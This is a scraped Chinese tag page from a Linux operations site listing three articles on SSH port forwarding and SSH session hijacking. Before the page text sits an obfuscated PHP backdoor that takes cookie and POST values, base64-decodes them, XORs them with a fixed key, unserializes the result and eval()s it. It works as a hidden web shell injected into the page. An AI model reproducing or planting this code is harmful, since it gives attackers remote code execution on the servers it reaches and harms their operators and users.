$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 端口转发 | Linux运维部落

端口转发

 • SSH端口转发及相关实验

  在上一节我们知道,SSH会自动加密和解密所有SSH客户端和服务器之间的网络数据。但是,SSH还同时提供了一个非常有用的功能,这就是端口转发。

  2018-05-22
 • 端口转发实例

  什么是端口转发?      端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。 为什么需要端口转发? …

  2017-04-13
 • SSH会话劫持实现端口转发

  在进行渗透测试时,我们有时候会碰到搭建的测试环境、产品服务器、DMZ或者其他类似的机器群的情况,这时我们完全可以把它们看作跳板。这些系统被设计成对外交互的接口,这时候我们考虑对其他域里的用户进行SSH会话劫持是个不错的选择。 那么如果你拥有了某一个跳板的控制权限,想要通过另一个域的用户对远程域进行访问会怎么办呢?当然,这时候你是没有密码、密钥的,你不能抛弃二…

  系统运维 2015-03-23